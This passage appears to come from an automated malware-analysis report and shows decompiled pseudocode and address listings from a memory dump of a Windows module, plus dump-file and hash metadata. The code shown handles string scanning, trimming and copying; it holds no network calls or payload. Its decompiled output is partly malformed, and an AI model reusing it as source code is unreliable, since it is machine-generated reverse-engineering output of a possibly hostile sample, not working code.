							if( *((char*)(_t240 + _t363)) == 0) {
								goto L165;
							}
							_t240 = _t240 + 1;
							__eflags = _t240 - _t347;
							if(_t240 < _t347) {
								continue;
							}
							goto L15;
						}
						goto L165;
					}
					_t188 =  &_v56;
					goto L37;
				}
				if(_t363 == 0) {
					L6:
					_push(1);
					_push(_t181);
					E6E7910B0();
					_t391 = _t391 + 8;
					goto L8;
				}
				_t349 =  *_t181;
				 *_t363 = _t349;
				if(_t349 == 0) {
					goto L6;
				}
				_t288 = 0;
				while(1) {
					_t288 = _t288 + 1;
					_t350 =  *((char*)(_t181 + _t288 * 2 - 1));
					 *((char*)(_t363 + _t288 * 2 - 1)) = _t350;
					if(_t350 == 0) {
						goto L6;
					}
					_t351 =  *((char*)(_t181 + _t288 * 2));
					 *((char*)(_t363 + _t288 * 2)) = _t351;
					if(_t351 != 0) {
						continue;
					}
					goto L6;
				}
				goto L6;
			}

0x6e7a173e
0x6e7a1742
0x6e7a1744
0x6e7a1748
0x6e7a174f
0x6e7a1751
0x6e7a1754
0x6e7a175a
0x6e7a1791
0x6e7a1794
0x6e7a1794
0x6e7a1798
0x6e7a17a0
0x6e7a17a6
0x6e7a17b1
0x6e7a17b3
0x6e7a1e9e
0x6e7a1ea3
0x6e7a182d
0x6e7a1832
0x6e7a1832
0x6e7a1835
0x6e7a1838
0x6e7a183b
0x6e7a183d
0x6e7a1852
0x6e7a1855
0x6e7a1855
0x6e7a185b
0x6e7a1863
0x6e7a1863
0x6e7a1863
0x6e7a1866
0x6e7a186d
0x6e7a1870
0x6e7a1876
0x6e7a1878
0x6e7a187b
0x6e7a187f
0x6e7a1881
0x6e7a18d6
0x00000000
0x6e7a1883
0x6e7a1883
0x6e7a1885
0x6e7a18c1
0x6e7a18c1
0x6e7a18c3
0x6e7a18c4
0x6e7a18c8
0x6e7a18cd
0x6e7a18d1
0x6e7a18d9
0x6e7a18d9
0x6e7a18dd
0x6e7a18e1
0x6e7a18e5
0x6e7a18e8
0x6e7a18ee
0x6e7a18f3
0x6e7a18f3
0x6e7a18f7
0x6e7a1900
0x6e7a1900
0x6e7a1905
0x6e7a1907
0x6e7a1909
0x6e7a1911
0x6e7a1913
0x6e7a1919
0x6e7a191d
0x6e7a1957
0x6e7a1a03
0x6e7a1a03
0x6e7a1a06
0x6e7a1a08
0x6e7a1a0f
0x6e7a1a0f
0x6e7a1a11
0x6e7a1a15
0x6e7a1a1f
0x6e7a1a23
0x6e7a1a33
0x6e7a1a33
0x6e7a1921
0x6e7a1947
0x6e7a1947
0x6e7a1949
0x6e7a194a
0x6e7a194f
0x00000000
0x6e7a194f
0x6e7a1923
0x6e7a1926
0x6e7a192a
0x00000000
0x00000000
0x6e7a192c
0x6e7a192e
0x6e7a192e
0x6e7a192f
0x6e7a1934
0x6e7a193a
0x00000000
0x00000000
0x6e7a193c
0x6e7a1940
0x6e7a1945
0x00000000
0x00000000
0x00000000
0x6e7a1945
0x00000000
0x6e7a192e
0x6e7a18f9
0x6e7a18fe
0x6e7a195f
0x6e7a1961
0x6e7a1963
0x6e7a19ac
0x6e7a19ac
0x6e7a19b1
0x6e7a19b3
0x6e7a19b5
0x6e7a19bd
0x6e7a19bf
0x6e7a19c5
0x6e7a19c7
0x6e7a19c9
0x6e7a1a00
0x00000000
0x6e7a1a00
0x6e7a19cb
0x6e7a19cd
0x6e7a19f3
0x6e7a19f3
0x6e7a19f5
0x6e7a19f6
0x6e7a19fb
0x00000000
0x6e7a19fb
0x6e7a19cf
0x6e7a19d2
0x6e7a19d4
0x6e7a19d6
0x00000000
0x00000000
0x6e7a19d8
0x6e7a19d8
0x6e7a19da
0x6e7a19da
0x6e7a19db
0x6e7a19e0
0x6e7a19e4
0x6e7a19e6
0x00000000
0x00000000
0x6e7a19e8
0x6e7a19ec
0x6e7a19ef
0x6e7a19f1
0x00000000
0x00000000
0x00000000
0x6e7a19f1
0x00000000
0x6e7a19da
0x6e7a1965
0x6e7a1968
0x00000000
0x00000000
0x6e7a196a
0x6e7a196e
0x6e7a1971
0x6e7a1977
0x6e7a197b
0x6e7a197e
0x6e7a1981
0x6e7a1981
0x6e7a1983
0x6e7a1986
0x6e7a198a
0x6e7a198c
0x6e7a198c
0x6e7a1992
0x6e7a1998
0x6e7a199b
0x6e7a199e
0x00000000
0x00000000
0x6e7a19a4
0x6e7a19a5
0x6e7a19a6
0x6e7a19aa
0x00000000
0x00000000
0x00000000
0x6e7a19aa
0x6e7a1a36
0x6e7a1a3a
0x6e7a1a3e
0x6e7a1a40
0x00000000
0x00000000
0x6e7a1a4b
0x6e7a1a4e
0x6e7a1a56
0x6e7a1a5a
0x6e7a1a5e
0x6e7a1a5e
0x6e7a1a61
0x6e7a1a65
0x6e7a1a69
0x6e7a1a69
0x6e7a1a6b
0x6e7a1a6d
0x6e7a1a8a
0x6e7a1a96
0x6e7a1a9a
0x6e7a1a9a
0x6e7a1aa0
0x6e7a1aa4
0x6e7a1aa4
0x6e7a1aa9
0x6e7a1aad
0x6e7a1ab1
0x6e7a1ab3
0x00000000
0x00000000
0x6e7a1ab9
0x6e7a1abc
0x6e7a1abe
0x00000000
0x00000000
0x6e7a1ac0
0x6e7a1ac4
0x6e7a1ac8
0x6e7a1ace
0x6e7a1aeb
0x6e7a1aeb
0x6e7a1af0
0x6e7a1af0
0x6e7a1af4
0x6e7a1af4
0x6e7a1af6
0x6e7a1af9
0x6e7a1afd
0x6e7a1b01
0x6e7a1b05
0x6e7a1b09
0x6e7a1b0c
0x6e7a1b0f
0x6e7a1b15
0x6e7a1b18
0x6e7a1b1b
0x6e7a1b21
0x6e7a1b24
0x6e7a1b27
0x6e7a1b29
0x00000000
0x00000000
0x6e7a1b35
0x6e7a1b37
0x6e7a1b40
0x6e7a1b40
0x6e7a1b44
0x6e7a1b46
0x00000000
0x00000000
0x6e7a1b4c
0x6e7a1b4c
0x6e7a1b4e
0x6e7a1bb1
0x6e7a1bb1
0x6e7a1bb4
0x6e7a1bc8
0x6e7a1bd4
0x6e7a1bd4
0x6e7a1bda
0x6e7a1bda
0x6e7a1bdf
0x6e7a1be3
0x6e7a1be7
0x6e7a1be9
0x00000000
0x00000000
0x6e7a1bef
0x6e7a1bf2
0x6e7a1bf4
0x00000000
0x00000000
0x6e7a1bf6
0x6e7a1bfc
0x6e7a1c0d
0x6e7a1c0d
0x6e7a1c12
0x6e7a1c17
0x6e7a1c19
0x6e7a1c1b
0x6e7a1c1d
0x6e7a1c23
0x6e7a1c23
0x6e7a1c25
0x6e7a1c25
0x6e7a1c2c
0x6e7a1c2e
0x6e7a1c31
0x6e7a1c31
0x6e7a1c33
0x6e7a1c37
0x6e7a1d7b
0x6e7a1d7b
0x6e7a1d82
0x6e7a1d84
0x6e7a1d8a
0x6e7a1d8c
0x6e7a1d8e
0x6e7a1dc8
0x00000000
0x6e7a1dc8
0x6e7a1d90
0x6e7a1d92
0x6e7a1db8
0x6e7a1db8
0x6e7a1dba
0x6e7a1dbb
0x6e7a1dc0
0x00000000
0x6e7a1dc0
0x6e7a1d94
0x6e7a1d97
0x6e7a1d99
0x6e7a1d9b
0x00000000
0x00000000
0x6e7a1d9d
0x6e7a1d9d
0x6e7a1d9f
0x6e7a1d9f
0x6e7a1da0
0x6e7a1da5
0x6e7a1da9
0x6e7a1dab
0x00000000
0x00000000
0x6e7a1dad
0x6e7a1db1
0x6e7a1db4
0x6e7a1db6
0x00000000
0x00000000
0x00000000
0x6e7a1db6
0x00000000
0x6e7a1d9f
0x6e7a1c3d
0x6e7a1c41
0x00000000
0x00000000
0x6e7a1c47
0x6e7a1c49
0x6e7a1cb0
0x6e7a1cb5
0x6e7a1cb5
0x6e7a1cb8
0x6e7a1cbb
0x6e7a1cbe
0x6e7a1cc0
0x6e7a1cd6
0x6e7a1cd9
0x6e7a1cd9
0x6e7a1cdf
0x6e7a1ce7
0x6e7a1ce7
0x6e7a1ce7
0x6e7a1cea
0x6e7a1cf4
0x6e7a1cf7
0x6e7a1cfa
0x6e7a1d00
0x6e7a1d02
0x6e7a1d08
0x6e7a1d0a
0x6e7a1d0c
0x6e7a1d43
0x00000000
0x6e7a1d0e
0x6e7a1d0e
0x6e7a1d10
0x6e7a1d36
0x6e7a1d36
0x6e7a1d38
0x6e7a1d39
0x6e7a1d3e
0x6e7a1d46
0x6e7a1d46
0x6e7a1d4c
0x6e7a1d4f
0x6e7a1d51
0x6e7a1d51
0x6e7a1d53
0x00000000
0x00000000
0x6e7a1d59
0x6e7a1d5d
0x6e7a1d63
0x6e7a1d63
0x6e7a1d66
0x6e7a1d67
0x6e7a1d69
0x6e7a1d6b
0x00000000
0x00000000
0x6e7a1d6d
0x6e7a1d6f
0x6e7a1dd0
0x00000000
0x6e7a1dd0
0x6e7a1d71
0x6e7a1d71
0x6e7a1d73
0x00000000
0x00000000
0x6e7a1d61
0x6e7a1d62
0x6e7a1d62
0x6e7a1d62
0x6e7a1d63
0x6e7a1d12
0x6e7a1d15
0x6e7a1d17
0x6e7a1d19
0x00000000
0x00000000
0x6e7a1d1b
0x6e7a1d1b
0x6e7a1d1d
0x6e7a1d1d
0x6e7a1d1e
0x6e7a1d23
0x6e7a1d27
0x6e7a1d29
0x00000000
0x00000000
0x6e7a1d2b
0x6e7a1d2f
0x6e7a1d32
0x6e7a1d34
0x00000000
0x00000000
0x00000000
0x6e7a1d34
0x00000000
0x6e7a1d1d
0x6e7a1d0c
0x6e7a1cc2
0x00000000
0x6e7a1cc2
0x6e7a1c4b
0x6e7a1c4f
0x6e7a1c4f
0x6e7a1c52
0x6e7a1c66
0x6e7a1c72
0x6e7a1c72
0x6e7a1c78
0x6e7a1c78
0x6e7a1c7d
0x6e7a1c81
0x6e7a1c85
0x6e7a1c87
0x00000000
0x00000000
0x6e7a1c8d
0x6e7a1c90
0x6e7a1c92
0x00000000
0x00000000
0x6e7a1c94
0x6e7a1c9a
0x6e7a1cab
0x6e7a1cab
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a1c9c
0x6e7a1c9c
0x6e7a1c9c
0x6e7a1ca0
0x00000000
0x00000000
0x6e7a1ca2
0x6e7a1ca3
0x6e7a1ca9
0x00000000
0x00000000
0x00000000
0x6e7a1ca9
0x00000000
0x6e7a1c9c
0x6e7a1dd9
0x6e7a1ddc
0x00000000
0x6e7a1ddc
0x6e7a1c56
0x6e7a1c58
0x6e7a1c58
0x6e7a1c5b
0x6e7a1c5b
0x6e7a1c5f
0x00000000
0x00000000
0x6e7a1c61
0x6e7a1c62
0x6e7a1c64
0x00000000
0x00000000
0x00000000
0x6e7a1c64
0x00000000
0x6e7a1c5b
0x6e7a1c1f
0x6e7a1c21
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a1bfe
0x6e7a1bfe
0x6e7a1bfe
0x6e7a1c02
0x00000000
0x00000000
0x6e7a1c04
0x6e7a1c05
0x6e7a1c0b
0x00000000
0x00000000
0x00000000
0x6e7a1c0b
0x00000000
0x6e7a1bfe
0x6e7a1de3
0x6e7a1de6
0x00000000
0x6e7a1de6
0x6e7a1bb8
0x6e7a1bba
0x6e7a1bba
0x6e7a1bbd
0x6e7a1bbd
0x6e7a1bc1
0x00000000
0x00000000
0x6e7a1bc3
0x6e7a1bc4
0x6e7a1bc6
0x00000000
0x00000000
0x00000000
0x6e7a1bc6
0x00000000
0x6e7a1bbd
0x6e7a1b50
0x6e7a1b55
0x6e7a1b57
0x6e7a1b59
0x6e7a1b61
0x6e7a1b63
0x6e7a1b69
0x6e7a1b6b
0x6e7a1b6d
0x6e7a1ba7
0x00000000
0x6e7a1ba7
0x6e7a1b6f
0x6e7a1b71
0x6e7a1b97
0x6e7a1b97
0x6e7a1b99
0x6e7a1b9a
0x6e7a1b9f
0x00000000
0x6e7a1b9f
0x6e7a1b73
0x6e7a1b76
0x6e7a1b78
0x6e7a1b7a
0x00000000
0x00000000
0x6e7a1b7c
0x6e7a1b7c
0x6e7a1b7e
0x6e7a1b7e
0x6e7a1b7f
0x6e7a1b84
0x6e7a1b88
0x6e7a1b8a
0x00000000
0x00000000
0x6e7a1b8c
0x6e7a1b90
0x6e7a1b93
0x6e7a1b95
0x00000000
0x00000000
0x00000000
0x6e7a1b95
0x00000000
0x6e7a1b7e
0x6e7a1b39
0x6e7a1b3a
0x6e7a1b3e
0x00000000
0x00000000
0x00000000
0x6e7a1b3e
0x6e7a1ded
0x6e7a1df0
0x6e7a1df6
0x6e7a1df6
0x6e7a1df7
0x00000000
0x00000000
0x6e7a1dfd
0x6e7a1e06
0x6e7a1e0b
0x6e7a1e0e
0x6e7a1e12
0x00000000
0x00000000
0x6e7a1e18
0x6e7a1e1b
0x6e7a1e1f
0x6e7a1e1f
0x6e7a1e20
0x6e7a1e21
0x6e7a1e2b
0x6e7a1e31
0x6e7a1e34
0x6e7a1e36
0x00000000
0x00000000
0x6e7a1e38
0x6e7a1e3b
0x00000000
0x00000000
0x00000000
0x6e7a1e3d
0x00000000
0x6e7a1e1f
0x6e7a1ad0
0x6e7a1ad4
0x6e7a1ad4
0x6e7a1ad8
0x00000000
0x00000000
0x6e7a1ade
0x6e7a1adf
0x6e7a1ae5
0x00000000
0x00000000
0x6e7a1ae7
0x00000000
0x6e7a1ae7
0x6e7a1e42
0x6e7a1e42
0x6e7a1e46
0x6e7a1e46
0x6e7a1e48
0x00000000
0x00000000
0x6e7a1e4e
0x00000000
0x00000000
0x00000000
0x6e7a1e54
0x6e7a1e59
0x6e7a1e5c
0x6e7a1e60
0x6e7a1e62
0x00000000
0x6e7a1e62
0x6e7a1a6f
0x6e7a1a73
0x6e7a1a75
0x6e7a1a75
0x6e7a1a77
0x6e7a1a77
0x6e7a1a7b
0x00000000
0x00000000
0x6e7a1a81
0x6e7a1a82
0x6e7a1a84
0x00000000
0x00000000
0x6e7a1a86
0x00000000
0x6e7a1a86
0x00000000
0x6e7a1e68
0x6e7a1e68
0x6e7a1e6b
0x6e7a1e6f
0x6e7a1e6f
0x00000000
0x6e7a1e77
0x00000000
0x6e7a18fe
0x6e7a1887
0x6e7a188a
0x6e7a188c
0x6e7a188e
0x00000000
0x00000000
0x6e7a1890
0x6e7a1894
0x6e7a1894
0x6e7a1896
0x6e7a189a
0x6e7a189d
0x6e7a189d
0x6e7a189e
0x6e7a18a3
0x6e7a18a7
0x6e7a18a9
0x00000000
0x00000000
0x6e7a18ab
0x6e7a18af
0x6e7a18b2
0x6e7a18b4
0x00000000
0x00000000
0x00000000
0x6e7a18b4
0x6e7a18b6
0x6e7a18ba
0x6e7a18be
0x00000000
0x6e7a18be
0x6e7a1881
0x6e7a183f
0x00000000
0x6e7a183f
0x6e7a17bb
0x6e7a17bb
0x6e7a17be
0x6e7a17d6
0x6e7a17da
0x6e7a17e6
0x6e7a17e6
0x6e7a17ec
0x6e7a17ec
0x6e7a17f1
0x6e7a17f5
0x6e7a17f9
0x6e7a17fb
0x00000000
0x00000000
0x6e7a1801
0x6e7a1804
0x6e7a1806
0x00000000
0x00000000
0x6e7a1808
0x6e7a180e
0x6e7a1823
0x6e7a1823
0x6e7a1828
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a1810
0x6e7a1810
0x6e7a1810
0x6e7a1814
0x00000000
0x00000000
0x6e7a181a
0x6e7a181b
0x6e7a1821
0x00000000
0x00000000
0x00000000
0x6e7a1821
0x6e7a1e7c
0x6e7a1e7c
0x6e7a1e7f
0x6e7a1e8d
0x6e7a1e81
0x6e7a1e81
0x6e7a1e84
0x6e7a1e84
0x00000000
0x6e7a1e7f
0x6e7a1e97
0x6e7a1e9a
0x00000000
0x6e7a1e9a
0x6e7a17c2
0x6e7a17c4
0x6e7a17c4
0x6e7a17c7
0x6e7a17c7
0x6e7a17cb
0x00000000
0x00000000
0x6e7a17d1
0x6e7a17d2
0x6e7a17d4
0x00000000
0x00000000
0x00000000
0x6e7a17d4
0x00000000
0x6e7a17c7
0x6e7a17a8
0x00000000
0x6e7a17a8
0x6e7a175e
0x6e7a1784
0x6e7a1784
0x6e7a1786
0x6e7a1787
0x6e7a178c
0x00000000
0x6e7a178c
0x6e7a1760
0x6e7a1763
0x6e7a1767
0x00000000
0x00000000
0x6e7a1769
0x6e7a176b
0x6e7a176b
0x6e7a176c
0x6e7a1771
0x6e7a1777
0x00000000
0x00000000
0x6e7a1779
0x6e7a177d
0x6e7a1782
0x00000000
0x00000000
0x00000000
0x6e7a1782
0x00000000

Strings

@, xrefs: 6E7A1798

Memory Dump Source

Source File: 00000001.00000002.810775796.000000006E781000.00000020.00020000.sdmp, Offset: 6E780000, based on PE: true

Associated: 00000001.00000002.810755520.000000006E780000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810925082.000000006E7B5000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.810943271.000000006E7BB000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.810959866.000000006E7BC000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction ID: 125e8a2b0585c984239fed8acde16797c15221049180798db97f4869710a0af1
Opcode Fuzzy Hash: a8b937767d9d941c8a342fb20a13b9f32eeb100c99e286f27a39f05552e35147
Instruction Fuzzy Hash: 69323BB0A083934BF701CEBD859031A7BE66FC6310F1887BDDAE54B266DA358549CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6E7A4CA0, Relevance: 1.6, Strings: 1, Instructions: 358
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6E7A4CA0(signed int* __ecx, intOrPtr* _a4) {
				char _v28;
				unsigned int _v32;
				void* _v36;
				unsigned int _t70;
				char* _t75;
				signed int _t78;
				signed int _t81;
				intOrPtr _t85;
				intOrPtr _t86;
				char _t88;
				void* _t89;
				intOrPtr* _t90;
				signed int _t92;
				void* _t98;
				void* _t99;
				signed int _t101;
				char _t102;
				char _t103;
				char _t104;
				signed int _t106;
				signed int _t107;
				signed int _t110;
				char* _t111;
				void* _t112;
				signed int _t115;
				char _t116;
				char _t117;
				char _t118;
				char _t119;
				char _t120;
				void* _t122;
				char* _t123;
				char _t133;
				char _t134;
				char _t136;
				char _t137;
				char* _t139;
				void* _t140;
				signed int _t142;
				char _t146;
				signed int _t148;
				signed int _t154;
				unsigned int _t155;
				char _t157;
				char _t158;
				char* _t161;
				char* _t162;
				intOrPtr* _t169;
				unsigned int _t170;
				void* _t171;
				signed int _t172;
				void* _t174;

				_t174 = (_t172 & 0xfffffff0) - 0x14;
				_t70 =  *0x6e7ba24c; // 0xa0d0920
				_t119 =  *0x6e7ba250; // 0x0
				_v32 = _t70;
				_v28 = _t119;
				_t101 =  *__ecx;
				if(_t101 == 0) {
					_t120 = 0;
					_t88 = 0;
				} else {
					_t142 = _t101 & 0x0000000f;
					if(_t142 == 0) {
						L5:
						asm("pxor xmm0, xmm0");
						_t98 =  ~( ~_t142 + 0x0000000f & 0x0000000f) + 0x7fffffff;
						while(1) {
							asm("movdqu xmm1, [ecx+edx]");
							asm("pcmpeqb xmm1, xmm0");
							asm("pmovmskb eax, xmm1");
							if(_t70 != 0) {
								break;
							}
							_t142 = _t142 + 0x10;
							if(_t142 < _t98) {
								continue;
							} else {
								if(_t98 >= 0x7fffffff) {
									L11:
									_t88 = 0x7fffffff;
									goto L12;
								} else {
									while( *((char*)(_t98 + _t101)) != 0) {
										_t98 = _t98 + 1;
										if(_t98 < 0x7fffffff) {
											continue;
										} else {
											goto L11;
										}
										goto L18;
									}
									goto L102;
								}
							}
							goto L18;
						}
						asm("bsf ebx, eax");
						_t88 = _t98 + _t142;
						goto L102;
					} else {
						_t88 = 0;
						_t142 =  ~_t142 + 0x10;
						while( *((char*)(_t88 + _t101)) != 0) {
							_t88 = _t88 + 1;
							if(_t88 < _t142) {
								continue;
							} else {
								goto L5;
							}
							goto L18;
						}
						L102:
						if(_t88 > 0) {
							L12:
							_t120 = 0;
							_t155 = _v32;
							_t171 = 0;
							_v36 = _t88;
							while(_t155 != 0) {
								_t86 =  *((intOrPtr*)(_t120 + _t101));
								_t99 = 0;
								while(_t86 !=  *((intOrPtr*)(_t174 + _t99 + 4))) {
									_t99 = _t99 + 1;
									if( *((char*)(_t174 + _t99 + 4)) != 0) {
										continue;
									}
									goto L17;
								}
								_t171 = _t171 + 1;
								_t120 = _t120 + 1;
								if(_t171 < _v36) {
									continue;
								} else {
									break;
								}
								L106:
							}
							L17:
							_t88 = _v36;
						} else {
							_t120 = 0;
						}
						goto L18;
						L93:
						return _t90;
						goto L106;
					}
				}
				L18:
				_t89 = _t88 - 1;
				_t146 = _t88 - _t120;
				if(_t89 >= _t120) {
					_t170 = _v32;
					_v36 = _t120;
					while(_t170 != 0) {
						_t85 =  *((intOrPtr*)(_t89 + _t101));
						_t140 = 0;
						while(_t85 !=  *((intOrPtr*)(_t174 + _t140 + 4))) {
							_t140 = _t140 + 1;
							if( *((char*)(_t174 + _t140 + 4)) != 0) {
								continue;
							}
							goto L24;
						}
						_t89 = _t89 - 1;
						_t146 = _t146 - 1;
						if(_t89 >= _v36) {
							continue;
						} else {
							break;
						}
						goto L93;
					}
					L24:
					_t120 = _v36;
				}
				_t90 = _a4;
				if(_t146 != 0) {
					if(_t101 == 0) {
						_t157 = 0;
					} else {
						_t81 = _t101 & 0x0000000f;
						if(_t81 == 0) {
							L39:
							asm("pxor xmm0, xmm0");
							_t157 =  ~( ~_t81 + 0x0000000f & 0x0000000f) + 0x7fffffff;
							while(1) {
								asm("movdqu xmm1, [ecx+eax]");
								asm("pcmpeqb xmm1, xmm0");
								asm("pmovmskb ebx, xmm1");
								if(_t90 != 0) {
									break;
								}
								_t81 = _t81 + 0x10;
								if(_t81 < _t157) {
									continue;
								} else {
									_t90 = _a4;
									if(_t157 >= 0x7fffffff) {
										L45:
										_t157 = 0x7fffffff;
									} else {
										while( *((char*)(_t157 + _t101)) != 0) {
											_t157 = _t157 + 1;
											if(_t157 < 0x7fffffff) {
												continue;
											} else {
												goto L45;
											}
											goto L46;
										}
									}
								}
								goto L46;
							}
							_t169 = _t90;
							asm("bsf esi, esi");
							_t90 = _a4;
							_t157 = _t169 + _t81;
						} else {
							_t157 = 0;
							_t81 =  ~_t81 + 0x10;
							while( *((char*)(_t157 + _t101)) != 0) {
								_t157 = _t157 + 1;
								if(_t157 < _t81) {
									continue;
								} else {
									goto L39;
								}
								goto L46;
							}
						}
					}
					L46:
					_t121 =  <=  ? 0 : _t120;
					_t122 =  <  ? _t157 :  <=  ? 0 : _t120;
					_t158 = _t157 - _t122;
					if(_t146 < 0 || _t146 > _t158) {
						_t146 = _t158;
					}
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t161 = _t122 + _t101;
					if(_t161 == 0 ||  *(_t101 + _t122) == 0) {
						_push(0x40);
						_t162 = E6E791030();
						_t174 = _t174 + 4;
						_t123 =  *_t90;
						if(_t123 == 0) {
							 *_t162 = 0;
						} else {
							if(_t162 != 0) {
								_t102 =  *_t123;
								 *_t162 = _t102;
								if(_t102 != 0) {
									_t148 = 0;
									while(1) {
										_t148 = _t148 + 1;
										_t103 =  *((char*)(_t123 + _t148 * 2 - 1));
										 *((char*)(_t162 + _t148 * 2 - 1)) = _t103;
										if(_t103 == 0) {
											goto L90;
										}
										_t104 =  *((char*)(_t123 + _t148 * 2));
										 *((char*)(_t162 + _t148 * 2)) = _t104;
										if(_t104 != 0) {
											continue;
										}
										goto L90;
									}
								}
							}
							L90:
							_push(1);
							_push(_t123);
							E6E7910B0();
							_t174 = _t174 + 8;
						}
						goto L92;
					} else {
						if(_t146 == 0) {
							_t115 = _t101 + _t122;
							_t78 = _t115 & 0x0000000f;
							if(_t78 == 0) {
								L56:
								asm("pxor xmm0, xmm0");
								_t146 =  ~( ~_t78 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								while(1) {
									asm("movdqu xmm1, [ecx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb edx, xmm1");
									if(_t122 != 0) {
										break;
									}
									_t78 = _t78 + 0x10;
									if(_t78 < _t146) {
										continue;
									} else {
										if(_t146 >= 0x7fffffff) {
											L62:
											_t146 = 0x7fffffff;
										} else {
											while( *((char*)(_t146 + _t115)) != 0) {
												_t146 = _t146 + 1;
												if(_t146 < 0x7fffffff) {
													continue;
												} else {
													goto L62;
												}
												goto L63;
											}
										}
									}
									goto L63;
								}
								asm("bsf edi, edx");
								_t146 = _t146 + _t78;
							} else {
								_t146 = 0;
								_t78 =  ~_t78 + 0x10;
								while( *((char*)(_t146 + _t115)) != 0) {
									_t146 = _t146 + 1;
									if(_t146 < _t78) {
										continue;
									} else {
										goto L56;
									}
									goto L63;
								}
							}
						}
						L63:
						_t36 = _t146 + 1; // 0x80000000
						_t106 =  <=  ? 0x40 : _t36;
						if(_t106 > 0) {
							_v32 = (_t106 >> 5 >> 0x1a) + _t106 >> 6;
							_t107 = _t106 & 0x8000003f;
							if(_t107 < 0) {
								_t107 = (_t107 - 0x00000001 | 0xffffffc0) + 1;
							}
							_t110 = _v32 + (0 | _t107 > 0x00000000) << 6;
							_v32 = _t110;
							_push(_t110);
							_t75 = E6E791030();
							_t174 = _t174 + 4;
							_t111 =  *_t90;
							if(_t111 == 0) {
								 *_t75 = 0;
							} else {
								if(_t75 != 0) {
									_t134 =  *_t111;
									 *_t75 = _t134;
									if(_t134 != 0) {
										_v36 = _t161;
										_t92 = 0;
										while(1) {
											_t92 = _t92 + 1;
											_t136 =  *((char*)(_t111 + _t92 * 2 - 1));
											 *((char*)(_t75 + _t92 * 2 - 1)) = _t136;
											if(_t136 == 0) {
												break;
											}
											_t137 =  *((char*)(_t111 + _t92 * 2));
											 *((char*)(_t75 + _t92 * 2)) = _t137;
											if(_t137 != 0) {
												continue;
											}
											break;
										}
										_t161 = _v36;
										_t90 = _a4;
									}
								}
								_push(1);
								_push(_t111);
								_v36 = _t75;
								E6E7910B0();
								_t75 = _v36;
								_t174 = _t174 + 8;
							}
							 *(_t90 + 4) = _v32;
							 *_t90 = _t75;
						} else {
							_t75 = 0;
						}
						if(_t75 != 0) {
							_t112 = 0;
							while(1) {
								_t133 =  *_t161;
								_t112 = _t112 + 1;
								 *_t75 = _t133;
								if(_t146 != 0 && _t112 == _t146) {
									break;
								}
								if(_t133 != 0) {
									_t75 = _t75 + 1;
									_t161 = _t161 + 1;
									continue;
								}
								goto L93;
							}
							 *((char*)(_t75 + 1)) = 0;
						}
					}
				} else {
					_push(0x40);
					 *_t90 = 0;
					 *(_t90 + 4) = 0;
					_t162 = E6E791030();
					_t174 = _t174 + 4;
					_t139 =  *_t90;
					if(_t139 == 0) {
						 *_t162 = 0;
					} else {
						if(_t162 != 0) {
							_t116 =  *_t139;
							 *_t162 = _t116;
							if(_t116 != 0) {
								_t154 = 0;
								while(1) {
									_t154 = _t154 + 1;
									_t117 =  *((char*)(_t139 + _t154 * 2 - 1));
									 *((char*)(_t162 + _t154 * 2 - 1)) = _t117;
									if(_t117 == 0) {
										goto L32;
									}
									_t118 =  *((char*)(_t139 + _t154 * 2));
									 *((char*)(_t162 + _t154 * 2)) = _t118;
									if(_t118 != 0) {
										continue;
									}
									goto L32;
								}
							}
						}
						L32:
						_push(1);
						_push(_t139);
						E6E7910B0();
						_t174 = _t174 + 8;
					}
					L92:
					 *(_t90 + 4) = 0x40;
					 *_t90 = _t162;
				}
				goto L93;
			}

0x6e7a4ca9
0x6e7a4cac
0x6e7a4cb1
0x6e7a4cb7
0x6e7a4cbb
0x6e7a4cbf
0x6e7a4cc3
0x6e7a508e
0x6e7a5090
0x6e7a4cc9
0x6e7a4ccb
0x6e7a4cce
0x6e7a4ce6
0x6e7a4cea
0x6e7a4cf6
0x6e7a4cfc
0x6e7a4cfc
0x6e7a4d01
0x6e7a4d05
0x6e7a4d0b
0x00000000
0x00000000
0x6e7a4d11
0x6e7a4d16
0x00000000
0x6e7a4d18
0x6e7a4d1e
0x6e7a4d33
0x6e7a4d33
0x00000000
0x6e7a4d20
0x6e7a4d20
0x6e7a4d2a
0x6e7a4d31
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4d31
0x00000000
0x6e7a4d20
0x6e7a4d1e
0x00000000
0x6e7a4d16
0x6e7a5087
0x6e7a508a
0x00000000
0x6e7a4cd0
0x6e7a4cd2
0x6e7a4cd4
0x6e7a4cd7
0x6e7a4ce1
0x6e7a4ce4
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7a4ce4
0x6e7a5078
0x6e7a507a
0x6e7a4d38
0x6e7a4d38
0x6e7a4d3a
0x6e7a4d3f
0x6e7a4d41
0x6e7a4d44
0x6e7a4d48
0x6e7a4d4b
0x6e7a4d4d
0x6e7a4d57
0x6e7a4d5d
0x00000000
0x00000000
0x00000000
0x6e7a4d5d
0x6e7a5068
0x6e7a5069
0x6e7a506d
0x00000000
0x6e7a5073
0x00000000
0x6e7a5073
0x00000000
0x6e7a506d
0x6e7a4d5f
0x6e7a4d5f
0x6e7a5080
0x6e7a5080
0x6e7a5080
0x00000000
0x6e7a5024
0x6e7a502f
0x00000000
0x6e7a502f
0x6e7a4cce
0x6e7a4d62
0x6e7a4d64
0x6e7a4d65
0x6e7a4d69
0x6e7a4d6b
0x6e7a4d70
0x6e7a4d73
0x6e7a4d77
0x6e7a4d7a
0x6e7a4d7c
0x6e7a4d86
0x6e7a4d8c
0x00000000
0x00000000
0x00000000
0x6e7a4d8c
0x6e7a5058
0x6e7a5059
0x6e7a505d
0x00000000
0x6e7a5063
0x00000000
0x6e7a5063
0x00000000
0x6e7a505d
0x6e7a4d8e
0x6e7a4d8e
0x6e7a4d8e
0x6e7a4d91
